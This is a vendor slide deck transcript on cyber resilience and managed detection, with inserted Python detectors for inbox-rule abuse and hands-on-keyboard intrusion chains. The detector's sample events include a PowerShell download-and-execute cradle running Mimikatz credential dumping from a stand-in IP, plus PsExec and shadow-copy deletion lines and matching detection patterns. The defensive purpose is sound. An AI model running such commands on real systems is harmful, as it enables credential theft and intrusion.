Given an outcome, we often exaggerate our ability to predict and therefore avoid the same fate. In cybersecurity, this misconception can lead to a false sense of corporate security, or worse, bury the true causes of incidents and lead to repeated data breaches or business-disrupting cyber incidents.
Building Cyber Resilience: No Safe Harbor
Slide 1
Building Cyber Resilience: No Safe Harbor
OISC 10 Mar 2021
Mark Sangster
Principal Evangelist and VP
Industry Security Strategies
eSentire
Nick Enger
CTO
ATC
Louie Hollmeyer
Director
ATC
Slide 2
ATC & eSentire
• Independent IT Consulting
• Digital Transformation (DX) in Four Core Segments:
o Voice | Network | Cloud | Cybersecurity
• Solution Agnostic
• 400+ Technology Providers
• Founded 2001
• Category Creator
• World’s Largest MDR Company
*Attendees will receive a copy of Mark’s book, “No Safe Harbor.” We will also
be raffling off Amazon gift cards to attendees and booth visitors.
**Mark will be in the ATC-eSentire booth directly following this presentation.
Slide 3
eSentire CONFIDENTIAL
eSentire Managed Detection and Response
• 2001: year founded
• 750+ customers across 48 countries
• 97% customer retention rate
• $6 Trillion+ in assets under protection
• 90% year-over-year growth
• 2.6 Billion+ indicators of concern ingested in 2019
• Offices: Seattle, Waterloo, New York, Cork, London
Slide 4
eSentire Managed Detection and Response
• Detection: IOC detection, incident detection, threat analysis, incident investigation
• Response: threat containment, disrupt, contain, threat hunting
• 24/7 monitoring; 360-degree threat hunting and response: 35 sec to triage, 20 min to containment
• Machine learning + human expertise
• Signals: network (north-south), endpoints (east-west), cloud (IaaS + SaaS), system logs, threat intelligence, data analytics
• SOC portal; Atlas cloud-native SOAR
Slide 8
On July 23 1983, Air Canada 143 was a passenger flight between Montreal and Edmonton. Midway through the flight at an altitude of 41,000 feet, the plane ran out of fuel.
The crew was able to glide the Boeing 767 aircraft safely to an emergency landing at a former Air Force base in Gimli, Manitoba. There were only minor injuries. This unusual aviation incident earned the aircraft the nickname "Gimli Glider."
Slide 9
The crew were initially hailed as heroes, but following the airline's internal investigation Captain Pearson was demoted for six months and First Officer Quintal was suspended for two weeks for allowing the incident to happen. Three maintenance workers were also suspended.
Slide 10
• Regulatory changes
• Mechanical failures
• Novel technology
• Human error
Slide 11
• Emerging technology: glass cockpit, fly-by-wire, two pilots (reduced crew), novel aircraft design
• Safety threats: human errors, miscalculations, obsolete governance, mechanical failures
• Accountability: FAA + NTSB, regulatory changes
Slide 12
• Accountability: compliance + contracts + coverage
• Sophisticated threats: malware-as-a-service, hands-on keyboard, cultural engineering
• Emerging technology: access (remote workers), assets (cloud-based workloads), distributed
Slide 13
Cyber accountability is growing
Reasonable care, attorney-client privilege and discovery, and ransom payment violations
Slide 14
• 1. Hands-on-keyboard: using your own tools
• 2. Malware-as-a-service: F500 business practices
• 3. Culture-based attacks: they understand your business
STATE-SPONSORED actors move downstream while ORGANIZED CRIME grows in ferocity and coordination
Slide 15
Business Email Compromise (BEC)
Fraudulent Transfers of Funds (FTF)
On April 1, 2018, the CFO of a firm received a phishing email, which redirected him to a site designed to look like a legitimate Microsoft Office 365 login page. The CFO unknowingly entered his login credentials.
The conspirators accessed the CFO's Office 365 account 464 times between April 6 and 20, 2018. They sent fraudulent wire transfer requests from the account to the financial team.
To hide their activities from the CFO, the conspirators created email rules to mark messages as read and move them to another folder.
The finance team at Unatrac processed 15 payments to overseas accounts, totaling almost $11 million, most of which could not be recovered.
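Hunting for the kind of mailbox rules used in the Unatrac case above, as an added example that is not from the deck and not eSentire's code: it parses a constructed export shaped like Microsoft 365 unified audit log records for the New-InboxRule cmdlet (Operation, UserId, ClientIP, and Parameters as Name/Value pairs; the field names are an assumption to verify against your own Search-UnifiedAuditLog output) and flags rules that mark mail read, delete it, or move it into folders nobody reads, scoring higher when the rule also filters on finance terms or carries a blank name.

```python
"""Flag inbox rules that hide mail from the mailbox owner, the technique the
attackers used against the CFO in the Unatrac BEC case.

Added example, not code from the original deck or from eSentire. The audit
records below are constructed to approximate the shape of Microsoft 365
unified audit log entries for Exchange cmdlets; check the field names
against a real export before relying on them.
"""
import json

# Folders attackers pick because users rarely open them.
HIDING_FOLDERS = {"rss subscriptions", "rss feeds", "junk email", "deleted items",
                  "archive", "conversation history", "notes"}
FINANCE_WORDS = {"invoice", "wire", "payment", "bank", "transfer", "remit", "swift"}
KEYWORD_PARAMS = ("SubjectContainsWords", "SubjectOrBodyContainsWords",
                  "BodyContainsWords", "FromAddressContainsWords")

# Constructed sample: three New-InboxRule events and one unrelated login event.
SAMPLE_AUDIT_LOG = """[
 {"CreationTime": "2018-04-06T08:12:44", "Operation": "New-InboxRule", "Workload": "Exchange",
  "UserId": "cfo@example-corp.test", "ClientIP": "203.0.113.10",
  "Parameters": [{"Name": "Name", "Value": "."},
                 {"Name": "SubjectOrBodyContainsWords", "Value": "invoice;wire;payment"},
                 {"Name": "MarkAsRead", "Value": "True"},
                 {"Name": "MoveToFolder", "Value": "RSS Subscriptions"}]},
 {"CreationTime": "2018-04-09T17:40:01", "Operation": "New-InboxRule", "Workload": "Exchange",
  "UserId": "cfo@example-corp.test", "ClientIP": "203.0.113.10",
  "Parameters": [{"Name": "Name", "Value": "cleanup"},
                 {"Name": "SubjectContainsWords", "Value": "out of office"},
                 {"Name": "DeleteMessage", "Value": "True"}]},
 {"CreationTime": "2018-04-10T09:05:00", "Operation": "New-InboxRule", "Workload": "Exchange",
  "UserId": "analyst@example-corp.test", "ClientIP": "198.51.100.7",
  "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                 {"Name": "SubjectContainsWords", "Value": "newsletter"},
                 {"Name": "MoveToFolder", "Value": "Newsletters"}]},
 {"CreationTime": "2018-04-10T09:06:00", "Operation": "MailboxLogin", "Workload": "Exchange",
  "UserId": "analyst@example-corp.test", "ClientIP": "198.51.100.7"}
]"""


def parse_audit_log(text):
    """Parse a JSON array of audit records (each the AuditData object of one row)."""
    return json.loads(text)


def _params(record):
    """Flatten the cmdlet's Name/Value parameter list into a dict of strings."""
    return {p["Name"]: str(p.get("Value", "")) for p in record.get("Parameters", [])}


def rule_findings(record):
    """Return human-readable reasons a rule looks like an attacker's hiding rule."""
    if record.get("Operation") not in {"New-InboxRule", "Set-InboxRule"}:
        return []
    p = _params(record)
    reasons = []
    mark_read = p.get("MarkAsRead", "").lower() == "true"
    folder = p.get("MoveToFolder", "")
    if p.get("DeleteMessage", "").lower() == "true":
        reasons.append("deletes matching mail")
    if mark_read and folder:
        reasons.append(f"marks mail read and moves it to '{folder}'")
    elif folder.lower() in HIDING_FOLDERS:
        reasons.append(f"moves mail to rarely viewed folder '{folder}'")
    elif mark_read:
        reasons.append("marks mail read without moving it")
    words = " ".join(p.get(k, "") for k in KEYWORD_PARAMS).lower()
    hits = sorted(w for w in FINANCE_WORDS if w in words)
    if hits:
        reasons.append("filters on finance terms: " + ", ".join(hits))
    name = p.get("Name", "")
    if not name.strip(" .,-_"):
        reasons.append(f"rule name {name!r} is blank or punctuation only")
    return reasons


def suspicious_rules(records):
    """Keep only rules that actually hide mail; extra indicators raise severity."""
    out = []
    for r in records:
        reasons = rule_findings(r)
        if not any(x.startswith(("deletes", "marks", "moves")) for x in reasons):
            continue
        out.append({"time": r["CreationTime"], "user": r["UserId"], "ip": r.get("ClientIP"),
                    "rule": _params(r).get("Name", ""),
                    "severity": "high" if len(reasons) >= 2 else "medium",
                    "reasons": reasons})
    return out


if __name__ == "__main__":
    for f in suspicious_rules(parse_audit_log(SAMPLE_AUDIT_LOG)):
        print(f"[{f['severity']}] {f['time']} {f['user']} from {f['ip']} "
              f"rule {f['rule']!r}: " + "; ".join(f["reasons"]))
```

To run it over a tenant, collect the AuditData JSON of each row returned by Search-UnifiedAuditLog -Operations New-InboxRule,Set-InboxRule into one array and pass it to parse_audit_log; the ClientIP on each hit is what lets you compare where the rule was created with the user's normal sign-in locations.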
Slide 16
Standing your ground against cyberattacks
• Counter-IR: 82%
• Custom malware: 50%
When you turn the lights on an adversary, assume an escalation
Ransomware-as-a-service lowers the entry barriers for prospective cybercrime entrepreneurs; it has the very real potential to increase the "supply" of ransomware operators.
VMware Carbon Black: Custom malware is now being used in 50 percent of the attacks reported by respondents, demonstrating the scale of the dark web, where such malware and malware services can be purchased to empower traditional criminals, spies and terrorists, many of whom do not have the sophisticated resources to execute these attacks.
CrowdStrike: PINCHY SPIDER pioneered the RaaS model of operations, in which the
developer receives a share of the profits that affiliates collect from successful
ransomware infections. Beginning in February 2019, this adversary advertised its
intention to partner with individuals skilled in RDP/VNC networks and with spammers
who have experience in corporate networking.
Slide 17
Complex and persistent campaigns to create a major security event and seven-figure ransoms
This is how phishing and cyber campaigns actually work
• Infiltration: harvest credentials → validating accounts → access via VPN or via RAT/RDP
• Data exfiltration
• Outcomes: data breach → resale revenue; public exposure → extortion payment; operational disruption → negotiated ransom
Slide 18
They understand your business
Exploiting industry culture to mimic trusted actors
Slide 19
44% Experienced a third-party material breach
32% Lack resources to audit third parties
15% Were notified by the third party responsible
Supply chain cyber risks
Three Ps of 3rd-Party Risk: Policies, Prevention and Promises
Slide 20
Never assume a cyber singularity
Adversaries use ecosystem experts to island hop and disable defenses
• Target intelligence: macro events, trusted sources, industry influences, social engineering
• Tailored campaign: hijacked docs, cloned email, chimera sites, client identities
• Hijacked credentials: client credentials, vendor credentials
• 1: VPN → endpoint via RDP → creates Account-B → PowerShell deploys Mimikatz
• 2: VPN → endpoint via RDP → creates Account-C → PsExec deploys SunCrypt ransomware
• 3: VPN → endpoint via RDP → creates Account-D → Revo uninstalls EDR → Netwalker ransomware
Slide 21
Accountability
• Can you see your entire environment?
• How do you manage cybersecurity expenses?
• How do you fill expertise gaps?
• How do you scale to handle the data volume?
• How quickly can you respond to threats?
• What is your cyber risk?
• What are your obligations?
Slide 22
MDR services offer turnkey threat detection and response via modern, remotely delivered, 24/7 security operations center capabilities and technology.
• MDR evolved from MSSP
• External SOC or augments internal capabilities
• MDR lacks a clear service definition across vendors
• Differentiation is difficult across varied approaches
Slide 23
1. Digital transformation leads to a lack of visibility
How do you cover the entire threat surface?
• Full spectrum detection: endpoints, network, cloud, logs, insider, assets
• Automated analysis: machine speed and scale; aggregation and correlation
• Expert-driven investigation: expert threat analysis; investigation and confirmation
• Atlas cloud SOAR: automation | orchestration | response
• Expert people + machine learning
• Containment: confirmed, immediate, unlimited, surgical, documented
Slide 24 (same MDR diagram as slide 23)
2. An avalanche of false positives leads to alert overload
How do you prioritize investigation?
Slide 25
3. Reducing dwell time is critical
How quickly can you respond to threats?
• Full spectrum detection: endpoints, network, cloud, logs, insider, assets
• Expert people + machine learning → containment
• 35 seconds to begin triage
• 6 investigations every minute
• 20 minutes to containment
• 646 confirmed incidents per day
One month of customer data (200 endpoints, 200 employees): 271,812 indicators of concern → 2,190 investigations → 65 security incidents → 2 escalations
Slide 26
4. Recruiting, retaining and retraining
How do you overcome the cybersecurity skills gap?
• Established talent pipeline: maintain access to cybersecurity professionals despite the global shortage
• Take care of your SOC analysts: prevent burnout, which is the number one problem
• Establish quality assurance: ensure customers receive the best possible service
• Invest in tools + technology: continually improve operational effectiveness, efficiency and human-machine collaboration in the face of ever-increasing threat signals
• Provide continuous education: support SOC analysts to level up with new skills and credentials through continuous education and certification
• Provide career advancement: support SOC analysts' advancement in the SOC, threat analytics or other areas of the organization
Slide 28
Sunwalker: pervasive and persistent attacks
Infection
• Step 0: Unknown IP connects via VPN to Endpoint-0
• Step 1: Compromised Account-A accesses Endpoint-0 via RDP
• Step 2: Creates Account-B and connects to System-0 via RDP
• Step 3: Account-B deploys Mimikatz via PowerShell on Endpoint-0
Detection
• Step 4: Detection rule triggered in Carbon Black Endpoint agent
Containment
• Step 5: eSentire SOC isolates Endpoint-0 and generates an alert
• Step 6: eSentire Threat Response Unit initiates a broader investigation and works with the client
Lateral attack
• Step 7: Attacker uses Endpoint-2 to deploy SunCrypt ransomware using PsExec
Containment
• Step 8: Lateral spread attempt is automatically blocked by Carbon Black Endpoint
Counter attack
• Step 9: Attacker downloads Revo Uninstaller to remove Carbon Black
• Step 10: Attacker uses Account-D to access the Domain Controller
• Step 11: Attacker attempts to execute Netwalker ransomware on Endpoint-2
Containment
• Step 12: Carbon Black Endpoint blocks attempts at lateral infection via PsExec
• Step 13: Carbon Black Endpoint blocks attempt to detonate Netwalker
• Step 14: eSentire SOC isolates Endpoint-2
Co-remediation
• Step 15: eSentire SOC alerts and makes recommendations
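The chain above is what a SOC has to stitch together from individually unremarkable events. As an added example that is not from the deck and is neither eSentire nor VMware Carbon Black code, the correlator below tags constructed endpoint events (RDP logons, account creation, process command lines) with a stage of that chain and raises a verdict only when several distinct stages land on one host inside a short window; the event schema, the VPN address pool, the process-name patterns and all sample events are assumptions made for illustration.

```python
"""Correlate endpoint telemetry into the hands-on-keyboard chain from the
steps above (VPN -> RDP -> new account -> Mimikatz via PowerShell ->
PsExec -> EDR removal -> ransomware).

Added example; not from the original deck and not eSentire or VMware
Carbon Black code. The event schema, VPN pool, process-name patterns and
every sample event are constructed assumptions.
"""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

VPN_POOL = ipaddress.ip_network("10.200.0.0/16")  # assumed pool handed to VPN clients


def _proc(e, pattern):
    """True when a process event's command line matches the pattern."""
    return e["type"] == "process" and re.search(pattern, e.get("cmdline", ""), re.I) is not None


def _rdp_from_vpn(e):
    """Windows logon type 10 (RemoteInteractive, i.e. RDP) sourced from the VPN pool."""
    if e["type"] != "logon" or e.get("logon_type") != 10:
        return False
    return ipaddress.ip_address(e.get("src_ip", "0.0.0.0")) in VPN_POOL


# Ordered: an event is tagged with the first stage it matches.
STAGES = [
    ("remote_access",    _rdp_from_vpn),
    ("new_account",      lambda e: e["type"] == "user_created"),
    ("credential_theft", lambda e: _proc(e, r"mimikatz|sekurlsa::|lsadump::")),
    ("lateral_movement", lambda e: _proc(e, r"psexe(c|svc)(64)?\.exe")),
    ("edr_removal",      lambda e: _proc(e, r"revoun|uninstall.*(carbon ?black|cb ?defense|repmgr)")),
    ("ransomware",       lambda e: _proc(e, r"suncrypt|netwalker|vssadmin.+delete +shadows")),
]

# Constructed sample telemetry for three hosts (times are ISO 8601, sortable as text).
SAMPLE_EVENTS = [
    {"time": "2021-02-10T02:03:00", "host": "Endpoint-0", "type": "logon", "user": "Account-A",
     "logon_type": 10, "src_ip": "10.200.4.17"},
    {"time": "2021-02-10T02:05:30", "host": "Endpoint-0", "type": "user_created", "user": "Account-A",
     "new_user": "Account-B"},
    {"time": "2021-02-10T02:09:12", "host": "Endpoint-0", "type": "process", "user": "Account-B",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString("
                "'http://203.0.113.5/m.ps1'); Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'\""},
    {"time": "2021-02-10T02:20:00", "host": "Endpoint-0", "type": "process", "user": "Account-B",
     "cmdline": "C:\\Windows\\explorer.exe"},
    {"time": "2021-02-11T09:00:00", "host": "Endpoint-0", "type": "process", "user": "Account-B",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"time": "2021-02-10T03:10:00", "host": "Endpoint-2", "type": "logon", "user": "Account-C",
     "logon_type": 10, "src_ip": "10.200.4.17"},
    {"time": "2021-02-10T03:15:00", "host": "Endpoint-2", "type": "process", "user": "Account-C",
     "cmdline": "psexec.exe \\\\FS01 -u Account-C -c C:\\Users\\Public\\svc.exe"},
    {"time": "2021-02-10T03:40:00", "host": "Endpoint-2", "type": "process", "user": "Account-D",
     "cmdline": "C:\\Users\\Public\\RevoUninstaller.exe"},
    {"time": "2021-02-10T03:55:00", "host": "Endpoint-2", "type": "process", "user": "Account-D",
     "cmdline": "C:\\Users\\Public\\netwalker.exe"},
    {"time": "2021-02-10T12:00:00", "host": "WS-HR-07", "type": "process", "user": "helpdesk",
     "cmdline": "psexec64.exe \\\\WS-HR-07 -s cmd.exe"},
    {"time": "2021-02-10T12:30:00", "host": "WS-HR-07", "type": "logon", "user": "helpdesk",
     "logon_type": 10, "src_ip": "192.168.10.5"},
]


def classify(event):
    """Return the first chain stage an event matches, or None for benign noise."""
    for stage, pred in STAGES:
        if pred(event):
            return stage
    return None


def correlate(events, window=timedelta(hours=2), min_stages=3):
    """Per host, find the largest set of distinct stages inside one sliding window.
    One matched stage is noise an admin produces daily; several in quick
    succession is an operator working the keyboard."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        stage = classify(e)
        if stage:
            by_host[e["host"]].append((datetime.fromisoformat(e["time"]), stage, e.get("user", "?")))
    findings = {}
    for host, hits in by_host.items():
        best = set()
        for i, (t0, _, _) in enumerate(hits):
            in_window = {s for t, s, _ in hits[i:] if t - t0 <= window}
            if len(in_window) > len(best):
                best = in_window
        findings[host] = {
            "timeline": [f"{t:%Y-%m-%d %H:%M} {s} ({u})" for t, s, u in hits],
            "stages_in_window": sorted(best),
            "verdict": "hands-on-keyboard intrusion" if len(best) >= min_stages else "needs triage",
        }
    return findings


if __name__ == "__main__":
    for host, f in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {f['verdict']} ({', '.join(f['stages_in_window'])})")
        for line in f["timeline"]:
            print("   ", line)
```

The window is the point: Endpoint-0's shadow-copy deletion the next morning stays on the timeline but does not count toward the verdict, and the help desk's lone PsExec on WS-HR-07 is left for triage rather than auto-isolated. Production EDR adds process lineage, file hashes and network context to each of these predicates; the structure of the decision is the same.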
Slide 29
Accountability
• 360° visibility: detection and response
• Cost effective: security for the midmarket
• Security expertise: 150+ SOC + TI analysts
• Rapid + scalable: alert processing
• 20 minutes: average time to resolution
• Risk management: CSO resources on call
Gandhi, Buddha or even Dante, author of the Divine Comedy.
Kidding. It’s from Fight Club.
Fictitious character
Unbeknownst to Pearson, Quintal, and the helpless air traffic controllers, the intended runway now served the Winnipeg Sports Car Club, as a multifunction auto racing facility. Much of the 6,800-foot runway had a steel guardrail running down the middle of it to create a two-lane dragstrip. The day of the incident, the racing club was hosting a family event with cars racing on the now decommissioned runway. Race cars and campers surrounded the runway, as children and families enjoyed their festivities on a beautiful summer day.
Seventeen minutes after running out of fuel, Air Canada Flight 143 came to final rest, mere yards from the racing cars and the event’s participants. The sixty-one passengers, eight crew members and the families on the ground were spared a horrific tragedy.
The sixty-one passengers, eight crew members, and hundreds of people attending the event survived.
Conversion from Imperial to Metric systems
Pilots and ground crew with little training made mistakes when calculating fuel requirements
The FQIS was not functioning (pilots were told): a known issue on the 767
Ran a dip-stick physical check on fuel load
Digital cockpit had a flight computer that could validate fuel loads and flight plans
Two pilots not three (the third was in charge of fueling)
New aircraft: assumed computer wasn’t working
MARK
Work through threat reports:
Organized crime
Hands on keyboard
Cultural engineering
Describe the danger of hands-on-keyboard and living-off-the-land attacks.
MARK
Tease the State Supreme Court attack and foreshadow Tia going into greater depth.
KEEGAN will take this slide
Illustrates both VMware CB and eSentire’s capabilities and why it’s important to have both
NOTE: Change CB Defense to CB Endpoint in the report